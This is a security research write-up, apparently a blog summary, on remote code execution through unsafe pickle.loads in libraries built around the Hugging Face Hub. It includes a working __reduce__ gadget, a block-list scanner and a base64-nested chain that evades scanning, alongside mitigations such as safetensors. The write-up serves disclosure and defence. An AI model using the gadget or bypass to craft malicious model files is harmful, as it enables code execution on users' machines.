How to Make Hugging Face Hug Worms: Discovering and Exploiting Unsafe Pickle.loads

Learn how attackers exploit unsafe pickle.loads calls in libraries built around the Hugging Face Hub, achieving remote code execution (RCE) through malicious models, and what can be done to prevent it.

Key takeaways
  • The Hugging Face Hub ecosystem integrates many third-party libraries that call unsafe pickle.loads on downloaded files, exposing users who load models to remote code execution (RCE)
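
The root cause is the classic pickle gadget: a pickle stream can instruct the deserializer to call any importable function via __reduce__. A minimal sketch, using a harmless placeholder command:

```python
import os
import pickle

class Exploit:
    # pickle calls __reduce__ to learn how to rebuild this object;
    # returning (os.system, ("id",)) makes deserialization run a command.
    def __reduce__(self):
        return (os.system, ("id",))

payload = pickle.dumps(Exploit())

# Any library that feeds attacker-controlled bytes to pickle.loads
# executes the command on the victim's machine.
pickle.loads(payload)  # runs `id`
```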

  • 58 unsafe pickle.loads call sites were discovered across 15 libraries, with 6 confirmed as exploitable

  • Three main security stakeholders were identified:

    • Platform maintainers (Hugging Face)
    • Third-party library maintainers
    • End users (potential victims)
  • Key attack vectors (the common vulnerable pattern is sketched after this list):

    • Malicious models uploaded to Hugging Face repositories
    • Configuration file abuse
    • Code reuse to bypass pickle scanning
    • Redirection from frontend to backend repositories
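
Each of these vectors ends at the same sink: a library fetches a file from a repository the attacker controls and hands it to pickle. A minimal sketch of that vulnerable pattern, using the real hf_hub_download API but a hypothetical repository and filename:

```python
import pickle

from huggingface_hub import hf_hub_download  # pip install huggingface_hub

# Hypothetical repo and filename; the download-then-unpickle pattern
# is what the vulnerable libraries have in common.
path = hf_hub_download(repo_id="someuser/some-model", filename="model.pkl")

with open(path, "rb") as f:
    model = pickle.load(f)  # whoever controls the repo controls this process
```
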
  • Hugging Face’s pickle scanning implementation uses three lists (a toy reconstruction follows this list):

    • Blacklist (blocked functions)
    • Whitelist (allowed functions)
    • Orange list (potentially dangerous functions)
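
A toy reconstruction of such list-based scanning, assuming illustrative list contents (these are not Hugging Face's actual lists, and a real scanner must also handle protocol-4 STACK_GLOBAL opcodes):

```python
import os
import pickle
import pickletools

BLACKLIST = {"posix system", "nt system", "builtins eval", "builtins exec"}  # blocked
WHITELIST = {"collections OrderedDict", "torch._utils _rebuild_tensor_v2"}   # allowed
ORANGE = {"base64 b64decode", "_pickle loads", "builtins getattr"}           # flagged

def scan(data: bytes) -> str:
    """Classify a pickle by the globals its GLOBAL opcodes import."""
    verdict = "safe"
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name != "GLOBAL":
            continue
        if arg in BLACKLIST:
            return "blocked"
        if arg in ORANGE:
            verdict = "suspicious"  # warn the user, but don't block
        elif arg not in WHITELIST:
            verdict = "suspicious"  # unknown import: also just a warning
    return verdict

class Evil:
    def __reduce__(self):
        return (os.system, ("id",))

print(scan(pickle.dumps({"weights": [1, 2, 3]}, protocol=3)))  # safe
print(scan(pickle.dumps(Evil(), protocol=3)))                  # blocked
```
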
  • Current protective measures are insufficient:

    • Base64-encoded payloads can slip past scanning
    • Orange-listed functions can be chained to call blacklisted ones (see the sketch below)
    • Third-party libraries often use raw pickle.loads
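
Those two gaps compose: an outer pickle that imports only orange-listed helpers (base64.b64decode and pickle.loads) can carry a blacklisted os.system payload as an opaque base64 string, which static scanning never decodes. A sketch of that bypass:

```python
import base64
import pickle
import pickletools

class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("id",))  # imports the blacklisted posix/nt system

inner = pickle.dumps(Payload(), protocol=3)

class B64Blob:
    """Unpickles to base64.b64decode(<encoded inner pickle>)."""
    def __init__(self, raw):
        self.raw = raw
    def __reduce__(self):
        return (base64.b64decode, (base64.b64encode(self.raw),))

class Dropper:
    """Unpickles to pickle.loads(b64decode(...)), detonating the inner payload."""
    def __reduce__(self):
        return (pickle.loads, (B64Blob(inner),))

outer = pickle.dumps(Dropper(), protocol=3)

# A global-based scanner sees only the orange-listed helpers; the dangerous
# import is buried inside a base64 bytes constant it treats as plain data.
print([arg for op, arg, _ in pickletools.genops(outer) if op.name == "GLOBAL"])
# e.g. ['_pickle loads', 'base64 b64decode']
# pickle.loads(outer) would execute `id` -- never load untrusted pickles.
```
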
  • Worm-like behavior is possible through:

    • Repository name matching
    • Automatic model downloading
    • Victim account reuse
    • Exploitation of default configuration paths
  • Recommendations:

    • Third-party maintainers should avoid raw pickle.loads
    • End users should be cautious when downloading and executing model code
    • The platform needs stronger validation and scanning mechanisms
  • Safe alternatives suggested (sketched after this list):

    • Using PyTorch’s torch.load (ideally with weights_only=True) instead of raw pickle.loads
    • Implementing proper input validation
    • Utilizing safe serialization formats such as safetensors
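
A sketch of those alternatives, with placeholder filenames: safetensors cannot execute code by design, torch.load's weights_only flag restricts unpickling to tensor data, and a restricted Unpickler (the approach documented in the stdlib pickle module) whitelists the globals a stream may import:

```python
import pickle

import torch
from safetensors.torch import load_file  # pip install safetensors

# Option 1: a serialization format with no code-execution surface at all.
tensors = load_file("model.safetensors")

# Option 2: PyTorch's loader, restricted to plain weight data.
state_dict = torch.load("pytorch_model.bin", weights_only=True)

# Option 3: if raw pickle is unavoidable, whitelist the allowed globals.
class RestrictedUnpickler(pickle.Unpickler):
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")

with open("config.pkl", "rb") as f:
    config = RestrictedUnpickler(f).load()
```
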
  • The impact extends beyond individual exploits, since the Hub serves as a central distribution point for AI models and datasets